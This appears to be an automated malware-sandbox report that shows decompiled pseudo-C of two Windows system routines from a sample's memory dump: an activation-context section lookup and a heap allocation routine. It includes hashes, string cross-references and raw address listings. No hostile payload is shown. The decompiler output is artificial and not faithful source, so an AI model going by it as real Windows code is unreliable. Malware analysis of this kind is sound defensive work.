                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                            • API String ID: 0-1988757188
                                                                            • Opcode ID: da5954cc47412dd18720f4d859fbb4d8e5b9d9adbe658d53f3386a7e17dba879
                                                                            • Instruction ID: d0e2d8bc06ab8f1cdbcf68e32d72f4c4dea9f1ce275953de1394022c3ed59493
                                                                            • Opcode Fuzzy Hash: da5954cc47412dd18720f4d859fbb4d8e5b9d9adbe658d53f3386a7e17dba879
                                                                            • Instruction Fuzzy Hash: B6E1D1706043429FD715EE28C884B6BB7E1BF892B4F114A2EF969CB291D731D845CB93
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D7ED690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 54%
                                                                            			E1D7ED690(signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, intOrPtr* _a20) {
				signed int _v8;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				char _v56;
				char _v60;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int* _v84;
				char _v88;
				signed int _v92;
				char _v93;
				signed int _v104;
				char _v117;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t150;
				char _t158;
				intOrPtr _t160;
				intOrPtr _t163;
				intOrPtr* _t164;
				intOrPtr _t170;
				signed int _t171;
				void* _t172;
				signed int _t195;
				intOrPtr* _t201;
				signed int _t205;
				intOrPtr* _t209;
				void* _t210;
				intOrPtr _t211;
				intOrPtr _t213;
				signed int _t214;
				intOrPtr* _t215;
				intOrPtr _t217;
				intOrPtr _t225;
				intOrPtr _t227;
				intOrPtr _t228;
				void* _t233;
				intOrPtr* _t234;
				signed int _t242;
				void* _t246;
				signed int _t247;
				signed int _t252;
				void* _t253;
				intOrPtr* _t254;
				intOrPtr _t255;
				signed int _t256;
				signed int _t258;

				_t258 = (_t256 & 0xfffffff8) - 0x5c;
				_v8 =  *0x1d8cb370 ^ _t258;
				_t217 =  *[fs:0x18];
				_t241 = _a16;
				_t209 = _a20;
				_t150 =  *((intOrPtr*)(_t217 + 0x30));
				_t252 = _a8;
				_v84 = _t241;
				_v80 = _t209;
				if( *((intOrPtr*)(_t150 + 0x1f8)) == 0) {
					if( *((intOrPtr*)(_t150 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t217 + 0x1a8)))) != 0) {
						goto L1;
					} else {
						_t151 = 0xc0150001;
						L24:
						_pop(_t246);
						_pop(_t253);
						_pop(_t210);
						return E1D814B50(_t151, _t210, _v8 ^ _t258, _t241, _t246, _t253);
					}
				}
				L1:
				_v88 = 0;
				if(_t241 == 0) {
					L49:
					_t151 = 0xc000000d;
					goto L24;
				}
				_t241 = _a4;
				if((_t241 & 0xfffffff8) != 0) {
					goto L49;
				}
				if((_t241 & 0x00000007) == 0) {
					if(_t209 != 0) {
						L5:
						if( *_t209 < 0x24) {
							goto L49;
						}
						L6:
						if((_t241 & 0x00000002) != 0) {
							if(_t209 + 0x2c <=  *_t209 + _t209) {
								goto L7;
							}
							_push(0xc000000d);
							_push("RtlpFindActivationContextSection_CheckParameters");
							_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
							L48:
							_push(0);
							_push(0x33);
							E1D85EF10();
							_t258 = _t258 + 0x14;
							goto L49;
						}
						L7:
						if((_t241 & 0x00000004) != 0) {
							if(_t209 + 0x40 <=  *_t209 + _t209) {
								goto L8;
							}
							_push(0xc000000d);
							_push("RtlpFindActivationContextSection_CheckParameters");
							_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
							goto L48;
						}
						L8:
						_t241 =  &_v76;
						_v48 = _a12;
						_v60 = 0x18;
						_v56 = 0;
						_v52 = _t252;
						_v40 = 0;
						_v64 = 0;
						_v44 = 0;
						if(E1D7ED580( &_v60,  &_v76,  &_v88,  &_v64) < 0) {
							goto L24;
						}
						_t151 = 0;
						if(0 < 0) {
							goto L24;
						}
						_t158 = _v88;
						if(_t158 < 0x28) {
							L34:
							_t254 = _v76;
							L91:
							_push(_t158);
							E1D85EF10(0x33, 0, "RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section\n", _t254);
							_t258 = _t258 + 0x14;
							_t151 = 0xc0150003;
							goto L24;
						}
						_t247 = _v64;
						while(1) {
							L12:
							_t254 = _v76;
							if( *_t254 != 0x64487347) {
								goto L91;
							}
							_t211 =  *((intOrPtr*)(_t254 + 0x14));
							_t160 = 1;
							if(_t211 == 0) {
								L19:
								_t225 =  *[fs:0x18];
								_t255 = _v44;
								_v92 = 0;
								_t247 = 0;
								_v68 = _t225;
								_t241 =  *(_t225 + 0x30);
								_v72 = _t241;
								L20:
								while(1) {
									if(_t255 <= 2) {
										_t163 = _t255;
										if(_t163 == 0) {
											_t164 =  *((intOrPtr*)(_t225 + 0x1a8));
											if(_t164 == 0) {
												L43:
												_t213 =  *((intOrPtr*)(_t241 + 0x1f8));
												_v92 = 0;
												if(_t213 == 0) {
													L28:
													_t213 =  *((intOrPtr*)(_t241 + 0x200));
													_v92 = 0xfffffffc;
													if(_t213 == 0) {
														goto L21;
													}
													_t255 = 3;
													_v44 = 3;
													L22:
													if(_t213 != 0) {
														_t241 = _v52;
														_t151 = E1D7EA600(_t213, _v52, _v48,  &_v76,  &_v88);
														if(_t151 < 0) {
															if(_t151 != 0xc0150001 || _t255 == 3) {
																L32:
																if(_t151 < 0) {
																	if(_t151 != 0xc0150001) {
																		goto L24;
																	}
																	goto L23;
																}
																_t158 = _v88;
																if(_t158 >= 0x28) {
																	goto L12;
																}
																goto L34;
															} else {
																_t225 = _v68;
																_t241 = _v72;
																continue;
															}
														}
														_t241 = _v92;
														_v40 = (0 | _t241 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t241 == 0x00000000;
														asm("sbb edi, edi");
														_t247 =  ~(_t241 - 0xfffffffc) & _t241;
														_t151 = 0;
														goto L32;
													}
													L23:
													_t151 = 0xc0150008;
													goto L24;
												}
												_t255 = 2;
												_v44 = 2;
												goto L22;
											}
											_t170 =  *_t164;
											if(_t170 == 0) {
												goto L43;
											}
											_t171 =  *((intOrPtr*)(_t170 + 4));
											_v92 = _t171;
											if(_t171 == 0) {
												L83:
												if(_t213 == 0) {
													goto L43;
												}
												L84:
												_t255 = 1;
												_v44 = 1;
												goto L22;
											}
											if(_t171 != 0xfffffffc) {
												if(_t171 != 0xfffffffd) {
													_t213 =  *((intOrPtr*)(_t171 + 0x10));
													goto L83;
												}
												_t213 = "Actx ";
												goto L84;
											}
											_t213 =  *((intOrPtr*)(_t241 + 0x200));
											goto L83;
										}
										_t172 = _t163 - 1;
										if(_t172 == 0) {
											goto L43;
										}
										if(_t172 != 1) {
											goto L21;
										}
										goto L28;
									}
									L21:
									if(_t255 > 3) {
										_t151 = 0xc00000e5;
										goto L24;
									}
									goto L22;
								}
							}
							if( *((intOrPtr*)(_t254 + 8)) != 1) {
								_t160 = 0;
							}
							_t227 =  *((intOrPtr*)(_t254 + 0x1c));
							if(_t227 != 0) {
								if(_t160 == 0) {
									goto L16;
								}
								_v92 = 0;
								_t233 =  *((intOrPtr*)(_t227 + _t254 + 4)) +  *_v84 %  *(_t227 + _t254) * 8;
								_t234 = _t233 + _t254;
								_t201 =  *((intOrPtr*)(_t233 + _t254 + 4)) + _t254;
								_v72 = _t234;
								if( *_t234 <= 0) {
									goto L19;
								} else {
									goto L54;
								}
								while(1) {
									L54:
									_t214 =  *_t201 + _t254;
									_v68 = _t201 + 4;
									if(E1D828050(_t214, _v84, 0x10) == 0x10) {
										goto L18;
									}
									_t205 = _v92 + 1;
									_v92 = _t205;
									_t201 = _v68;
									if(_t205 <  *_v72) {
										continue;
									}
									goto L19;
								}
							} else {
								L16:
								_t228 =  *((intOrPtr*)(_t254 + 0x18));
								if(( *(_t254 + 0x10) & 0x00000001) == 0) {
									_t174 = _t228 + _t254;
									_v92 = _t228 + _t254;
									while(E1D828050(_t174, _v84, 0x10) != 0x10) {
										_t174 = _v92 + 0x1c;
										_v92 = _v92 + 0x1c;
										_t211 = _t211 - 1;
										if(_t211 != 0) {
											continue;
										}
										goto L19;
									}
									_t214 = _v92;
									L18:
									if(_t214 != 0) {
										if( *((intOrPtr*)(_t214 + 0x10)) == 0) {
											goto L19;
										}
										_t241 = _v80;
										if(_t241 != 0) {
											 *((intOrPtr*)(_t241 + 4)) =  *((intOrPtr*)(_t254 + 0xc));
											 *((intOrPtr*)(_t241 + 8)) =  *((intOrPtr*)(_t214 + 0x10)) + _t254;
											 *((intOrPtr*)(_t241 + 0xc)) =  *((intOrPtr*)(_t214 + 0x14));
											if(_t241 + 0x28 <=  *_t241 + _t241) {
												 *((intOrPtr*)(_t241 + 0x24)) =  *((intOrPtr*)(_t214 + 0x18));
											}
										}
										if((_t247 - 0x00000001 | 0x00000007) != 0xffffffff) {
											_t215 =  *((intOrPtr*)(_t247 + 0x14));
											if(_t215 != 0 && (( *(_t247 + 0x1c) & 0x00000008) == 0 || ( *(_t247 + 0x3c) & 0x00000008) == 0)) {
												_v93 = 0;
												 *0x1d8c91e0(3, _t247,  *((intOrPtr*)(_t247 + 0x10)),  *((intOrPtr*)(_t247 + 0x18)), 0,  &_v93);
												 *_t215();
												 *(_t247 + 0x1c) =  *(_t247 + 0x1c) | 0x00000008;
												_t241 = _v104;
												if(_v117 != 0) {
													 *(_t247 + 0x3c) =  *(_t247 + 0x3c) | 0x00000008;
												}
											}
										}
										if(_t241 == 0 || E1D7D4428(_a4, _t241, _t247,  &_v60, _t254,  *((intOrPtr*)(_t254 + 0x20)),  *((intOrPtr*)(_t254 + 0x24)), _v88) >= 0) {
											_t151 = 0;
										}
										goto L24;
									}
									goto L19;
								}
								_t242 = _v84;
								_v36 =  *_t242;
								_v32 =  *((intOrPtr*)(_t242 + 4));
								_v28 =  *((intOrPtr*)(_t242 + 8));
								_v24 =  *((intOrPtr*)(_t242 + 0xc));
								_t195 = E1D818170( &_v36, _t228 + _t254, _t211, 0x1c, E1D7CB600);
								_t258 = _t258 + 0x14;
								_t214 = _t195;
							}
							goto L18;
						}
						goto L91;
					}
					goto L6;
				}
				if(_t209 == 0) {
					goto L49;
				}
				goto L5;
			}




























































                                                                            0x1d7ed698
                                                                            0x1d7ed6a2
                                                                            0x1d7ed6a6
                                                                            0x1d7ed6ad
                                                                            0x1d7ed6b1
                                                                            0x1d7ed6b4
                                                                            0x1d7ed6b8
                                                                            0x1d7ed6c3
                                                                            0x1d7ed6c7
                                                                            0x1d7ed6cb
                                                                            0x1d7ed90e
                                                                            0x00000000
                                                                            0x1d83913f
                                                                            0x1d83913f
                                                                            0x1d7ed847
                                                                            0x1d7ed84b
                                                                            0x1d7ed84c
                                                                            0x1d7ed84d
                                                                            0x1d7ed858
                                                                            0x1d7ed858
                                                                            0x1d7ed90e
                                                                            0x1d7ed6d1
                                                                            0x1d7ed6d1
                                                                            0x1d7ed6db
                                                                            0x1d839164
                                                                            0x1d839164
                                                                            0x00000000
                                                                            0x1d839164
                                                                            0x1d7ed6e1
                                                                            0x1d7ed6ea
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7ed6f3
                                                                            0x1d7ed8fc
                                                                            0x1d7ed701
                                                                            0x1d7ed704
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7ed70a
                                                                            0x1d7ed70d
                                                                            0x1d7ed922
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d839149
                                                                            0x1d83914e
                                                                            0x1d839153
                                                                            0x1d839158
                                                                            0x1d839158
                                                                            0x1d83915a
                                                                            0x1d83915c
                                                                            0x1d839161
                                                                            0x00000000
                                                                            0x1d839161
                                                                            0x1d7ed713
                                                                            0x1d7ed716
                                                                            0x1d7ed936
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d83916e
                                                                            0x1d839173
                                                                            0x1d839178
                                                                            0x00000000
                                                                            0x1d839178
                                                                            0x1d7ed71c
                                                                            0x1d7ed71f
                                                                            0x1d7ed723
                                                                            0x1d7ed72f
                                                                            0x1d7ed73c
                                                                            0x1d7ed745
                                                                            0x1d7ed749
                                                                            0x1d7ed751
                                                                            0x1d7ed759
                                                                            0x1d7ed768
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7ed76e
                                                                            0x1d7ed772
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7ed778
                                                                            0x1d7ed77f
                                                                            0x1d7ed8f1
                                                                            0x1d7ed8f1
                                                                            0x1d839370
                                                                            0x1d839370
                                                                            0x1d83937b
                                                                            0x1d839380
                                                                            0x1d839383
                                                                            0x00000000
                                                                            0x1d839383
                                                                            0x1d7ed785
                                                                            0x1d7ed790
                                                                            0x1d7ed790
                                                                            0x1d7ed790
                                                                            0x1d7ed79a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7ed7a0
                                                                            0x1d7ed7a3
                                                                            0x1d7ed7a7
                                                                            0x1d7ed80d
                                                                            0x1d7ed80d
                                                                            0x1d7ed816
                                                                            0x1d7ed81c
                                                                            0x1d7ed820
                                                                            0x1d7ed822
                                                                            0x1d7ed826
                                                                            0x1d7ed829
                                                                            0x00000000
                                                                            0x1d7ed830
                                                                            0x1d7ed833
                                                                            0x1d7ed85d
                                                                            0x1d7ed860
                                                                            0x1d8392e0
                                                                            0x1d8392e8
                                                                            0x1d7ed941
                                                                            0x1d7ed941
                                                                            0x1d7ed949
                                                                            0x1d7ed94f
                                                                            0x1d7ed874
                                                                            0x1d7ed874
                                                                            0x1d7ed87a
                                                                            0x1d7ed884
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7ed886
                                                                            0x1d7ed88b
                                                                            0x1d7ed83e
                                                                            0x1d7ed840
                                                                            0x1d7ed891
                                                                            0x1d7ed8a5
                                                                            0x1d7ed8ac
                                                                            0x1d83933a
                                                                            0x1d7ed8dc
                                                                            0x1d7ed8de
                                                                            0x1d83935b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d839361
                                                                            0x1d7ed8e4
                                                                            0x1d7ed8eb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d839349
                                                                            0x1d839349
                                                                            0x1d83934d
                                                                            0x00000000
                                                                            0x1d83934d
                                                                            0x1d83933a
                                                                            0x1d7ed8b2
                                                                            0x1d7ed8d2
                                                                            0x1d7ed8d6
                                                                            0x1d7ed8d8
                                                                            0x1d7ed8da
                                                                            0x00000000
                                                                            0x1d7ed8da
                                                                            0x1d7ed842
                                                                            0x1d7ed842
                                                                            0x00000000
                                                                            0x1d7ed842
                                                                            0x1d7ed955
                                                                            0x1d7ed95a
                                                                            0x00000000
                                                                            0x1d7ed95a
                                                                            0x1d8392ee
                                                                            0x1d8392f2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8392f8
                                                                            0x1d8392fb
                                                                            0x1d839301
                                                                            0x1d83931f
                                                                            0x1d839321
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d839327
                                                                            0x1d839327
                                                                            0x1d83932c
                                                                            0x00000000
                                                                            0x1d83932c
                                                                            0x1d839306
                                                                            0x1d839313
                                                                            0x1d83931c
                                                                            0x00000000
                                                                            0x1d83931c
                                                                            0x1d839315
                                                                            0x00000000
                                                                            0x1d839315
                                                                            0x1d839308
                                                                            0x00000000
                                                                            0x1d839308
                                                                            0x1d7ed866
                                                                            0x1d7ed869
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7ed872
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7ed872
                                                                            0x1d7ed835
                                                                            0x1d7ed838
                                                                            0x1d839366
                                                                            0x00000000
                                                                            0x1d839366
                                                                            0x00000000
                                                                            0x1d7ed838
                                                                            0x1d7ed830
                                                                            0x1d7ed7ad
                                                                            0x1d83917f
                                                                            0x1d83917f
                                                                            0x1d7ed7b3
                                                                            0x1d7ed7b8
                                                                            0x1d839188
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d839194
                                                                            0x1d8391a5
                                                                            0x1d8391ac
                                                                            0x1d8391ae
                                                                            0x1d8391b0
                                                                            0x1d8391b7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8391bd
                                                                            0x1d8391bd
                                                                            0x1d8391c8
                                                                            0x1d8391ca
                                                                            0x1d8391d7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8391e5
                                                                            0x1d8391e6
                                                                            0x1d8391ec
                                                                            0x1d8391f0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8391f2
                                                                            0x1d7ed7be
                                                                            0x1d7ed7be
                                                                            0x1d7ed7c2
                                                                            0x1d7ed7c5
                                                                            0x1d8391f7
                                                                            0x1d8391fa
                                                                            0x1d8391fe
                                                                            0x1d839213
                                                                            0x1d839216
                                                                            0x1d83921a
                                                                            0x1d83921d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d83921f
                                                                            0x1d839224
                                                                            0x1d7ed805
                                                                            0x1d7ed807
                                                                            0x1d839231
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d839237
                                                                            0x1d83923d
                                                                            0x1d839244
                                                                            0x1d83924e
                                                                            0x1d839254
                                                                            0x1d83925c
                                                                            0x1d839261
                                                                            0x1d839261
                                                                            0x1d83925c
                                                                            0x1d83926d
                                                                            0x1d83926f
                                                                            0x1d839274
                                                                            0x1d839286
                                                                            0x1d839299
                                                                            0x1d83929f
                                                                            0x1d8392a1
                                                                            0x1d8392aa
                                                                            0x1d8392ae
                                                                            0x1d8392b0
                                                                            0x1d8392b0
                                                                            0x1d8392ae
                                                                            0x1d839274
                                                                            0x1d8392b6
                                                                            0x1d8392d9
                                                                            0x1d8392d9
                                                                            0x00000000
                                                                            0x1d8392b6
                                                                            0x00000000
                                                                            0x1d7ed807
                                                                            0x1d7ed7cb
                                                                            0x1d7ed7d9
                                                                            0x1d7ed7e0
                                                                            0x1d7ed7e7
                                                                            0x1d7ed7ee
                                                                            0x1d7ed7fb
                                                                            0x1d7ed800
                                                                            0x1d7ed803
                                                                            0x1d7ed803
                                                                            0x00000000
                                                                            0x1d7ed7b8
                                                                            0x00000000
                                                                            0x1d7ed790
                                                                            0x00000000
                                                                            0x1d7ed902
                                                                            0x1d7ed6fb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000

                                                                            APIs
                                                                            Strings
                                                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D839153
                                                                            • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1D839372
                                                                            • Actx , xrefs: 1D839315
                                                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 1D83914E, 1D839173
                                                                            • GsHd, xrefs: 1D7ED794
                                                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D839178
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                            • API String ID: 3446177414-2196497285
                                                                            • Opcode ID: d9212c6f9b32d9ec22d6ac71aec9db4c002abb7a12868cbba956ab23e851eb68
                                                                            • Instruction ID: 4036cfae106490241809d9fefbb62c4a52d8e4ab657873461a747c2b80352f3f
                                                                            • Opcode Fuzzy Hash: d9212c6f9b32d9ec22d6ac71aec9db4c002abb7a12868cbba956ab23e851eb68
                                                                            • Instruction Fuzzy Hash: 9DE1AE706083429FD701CF1CC880B6AB7E5BF88768F044A2EF9999B291D771E845CB93
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D87F0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 62%
                                                                            			E1D87F0A5(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t87;
				signed int _t89;
				signed int _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				signed char _t105;
				signed int _t106;
				intOrPtr _t108;
				signed int _t109;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t116;
				short* _t134;
				short _t135;
				signed char _t153;
				signed int* _t158;
				short* _t169;
				signed int _t174;
				signed int _t184;
				signed int _t185;
				intOrPtr* _t190;
				void* _t191;

				_push(0x3c);
				_push(0x1d8ad320);
				E1D827BE4(__ebx, __edi, __esi);
				_t188 = __ecx;
				 *((intOrPtr*)(_t191 - 0x3c)) = __ecx;
				 *((char*)(_t191 - 0x19)) = 0;
				 *(_t191 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *(_t191 - 4) = 0;
					 *(_t191 - 4) = 1;
					_t87 = E1D7C7662("RtlAllocateHeap");
					__eflags = _t87;
					if(_t87 == 0) {
						L46:
						 *(_t191 - 0x24) = 0;
						L47:
						 *(_t191 - 4) = 0;
						 *(_t191 - 4) = 0xfffffffe;
						E1D87F3F9();
						_t89 =  *(_t191 - 0x24);
						goto L48;
					}
					_t153 =  *(__ecx + 0x44) | __edx;
					 *(_t191 - 0x2c) = _t153;
					_t183 = _t153 | 0x10000100;
					 *(_t191 - 0x34) = _t153 | 0x10000100;
					_t174 =  *(_t191 + 8);
					__eflags = _t174;
					 *(_t191 - 0x20) = _t174;
					if(_t174 == 0) {
						 *(_t191 - 0x20) = 1;
					}
					_t92 =  *((intOrPtr*)(_t188 + 0x94)) +  *(_t191 - 0x20) &  *(_t188 + 0x98);
					__eflags = _t92 - 0x10;
					if(_t92 < 0x10) {
						_t92 = 0x10;
					}
					_t93 = _t92 + 8;
					 *((intOrPtr*)(_t191 - 0x40)) = _t93;
					__eflags = _t93 - _t174;
					if(_t93 < _t174) {
						L42:
						_t94 =  *[fs:0x30];
						__eflags =  *(_t94 + 0xc);
						if( *(_t94 + 0xc) == 0) {
							_push("HEAP: ");
							E1D7CB910();
						} else {
							E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t188 + 0x78)));
						E1D7CB910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t191 + 8));
						goto L46;
					} else {
						__eflags = _t93 -  *((intOrPtr*)(_t188 + 0x78));
						if(_t93 >  *((intOrPtr*)(_t188 + 0x78))) {
							goto L42;
						}
						__eflags = _t153 & 0x00000001;
						if((_t153 & 0x00000001) == 0) {
							E1D7DFED0( *((intOrPtr*)(_t188 + 0xc8)));
							 *((char*)(_t191 - 0x19)) = 1;
							_t183 =  *(_t191 - 0x2c) | 0x10000101;
							__eflags = _t183;
							 *(_t191 - 0x34) = _t183;
						}
						E1D880835(_t188, 0);
						_t184 = E1D7E5D90(_t188, _t188, _t183,  *(_t191 + 8));
						 *(_t191 - 0x24) = _t184;
						_t176 = 1;
						E1D880D24(_t188);
						__eflags = _t184;
						if(_t184 == 0) {
							goto L47;
						} else {
							_t185 = _t184 + 0xfffffff8;
							__eflags =  *((char*)(_t185 + 7)) - 5;
							if( *((char*)(_t185 + 7)) == 5) {
								_t185 = _t185 - (( *(_t185 + 6) & 0x000000ff) << 3);
								__eflags = _t185;
							}
							_t158 = _t185;
							 *(_t191 - 0x38) = _t185;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *(_t185 + 3) - (_t158[0] ^ _t158[0] ^  *_t158);
								if(__eflags != 0) {
									_push(_t158);
									_t176 = _t185;
									E1D88D646(0, _t188, _t185, _t185, _t188, __eflags);
								}
							}
							__eflags =  *(_t185 + 2) & 0x00000002;
							if(( *(_t185 + 2) & 0x00000002) == 0) {
								_t105 =  *(_t185 + 3);
								 *(_t191 - 0x1a) = _t105;
								_t106 = _t105 & 0x000000ff;
							} else {
								_t134 = E1D803AE9(_t185);
								 *((intOrPtr*)(_t191 - 0x28)) = _t134;
								__eflags =  *(_t188 + 0x40) & 0x08000000;
								if(( *(_t188 + 0x40) & 0x08000000) == 0) {
									 *_t134 = 0;
								} else {
									_t135 = E1D7FFDB9(1, _t176);
									_t169 =  *((intOrPtr*)(_t191 - 0x28));
									 *_t169 = _t135;
									_t134 = _t169;
								}
								_t45 = _t134 + 2; // 0xffff
								_t106 =  *_t45 & 0x0000ffff;
							}
							 *(_t191 - 0x2c) = _t106;
							 *(_t191 - 0x20) = _t106;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *(_t185 + 3) =  *(_t185 + 2) ^  *(_t185 + 1) ^  *_t185;
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *_t185;
							}
							__eflags =  *(_t188 + 0x40) & 0x20000000;
							if(( *(_t188 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E1D880835(_t188, 0);
							}
							__eflags =  *(_t191 - 0x24) -  *0x1d8c47c0; // 0x0
							_t108 =  *[fs:0x30];
							if(__eflags != 0) {
								_t109 =  *(_t108 + 0x68);
								 *(_t191 - 0x44) = _t109;
								__eflags = _t109 & 0x00000800;
								if((_t109 & 0x00000800) == 0) {
									goto L47;
								}
								_t110 =  *(_t191 - 0x2c);
								__eflags = _t110;
								if(_t110 == 0) {
									goto L47;
								}
								__eflags = _t110 -  *0x1d8c47c4; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								__eflags =  *((intOrPtr*)(_t188 + 0x7c)) -  *0x1d8c47c6; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								_t112 =  *[fs:0x30];
								__eflags =  *(_t112 + 0xc);
								if( *(_t112 + 0xc) == 0) {
									_push("HEAP: ");
									E1D7CB910();
								} else {
									E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E1D87823A(_t188,  *(_t191 - 0x20)));
								_push( *(_t191 + 8));
								E1D7CB910("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t191 - 0x24));
								goto L32;
							} else {
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E1D7CB910();
								} else {
									E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t191 + 8));
								E1D7CB910("Just allocated block at %p for %Ix bytes\n",  *0x1d8c47c0);
								L32:
								_t116 =  *[fs:0x30];
								__eflags =  *((char*)(_t116 + 2));
								if( *((char*)(_t116 + 2)) != 0) {
									 *0x1d8c47a1 = 1;
									 *0x1d8c4100 = 0;
									asm("int3");
									 *0x1d8c47a1 = 0;
								}
								goto L47;
							}
						}
					}
				} else {
					_t190 =  *0x1d8c3748; // 0x0
					 *0x1d8c91e0(__ecx, __edx,  *(_t191 + 8));
					_t89 =  *_t190();
					L48:
					 *[fs:0x0] =  *((intOrPtr*)(_t191 - 0x10));
					return _t89;
				}
			}

























                                                                            0x1d87f0a5
                                                                            0x1d87f0a7
                                                                            0x1d87f0ac
                                                                            0x1d87f0b3
                                                                            0x1d87f0b5
                                                                            0x1d87f0ba
                                                                            0x1d87f0bd
                                                                            0x1d87f0c7
                                                                            0x1d87f0e3
                                                                            0x1d87f0e6
                                                                            0x1d87f0f4
                                                                            0x1d87f0f9
                                                                            0x1d87f0fb
                                                                            0x1d87f3d2
                                                                            0x1d87f3d2
                                                                            0x1d87f3d5
                                                                            0x1d87f3d5
                                                                            0x1d87f3d8
                                                                            0x1d87f3df
                                                                            0x1d87f3e4
                                                                            0x00000000
                                                                            0x1d87f3e4
                                                                            0x1d87f104
                                                                            0x1d87f106
                                                                            0x1d87f10b
                                                                            0x1d87f111
                                                                            0x1d87f114
                                                                            0x1d87f117
                                                                            0x1d87f119
                                                                            0x1d87f11c
                                                                            0x1d87f11e
                                                                            0x1d87f11e
                                                                            0x1d87f12e
                                                                            0x1d87f134
                                                                            0x1d87f137
                                                                            0x1d87f13b
                                                                            0x1d87f13b
                                                                            0x1d87f13c
                                                                            0x1d87f13f
                                                                            0x1d87f142
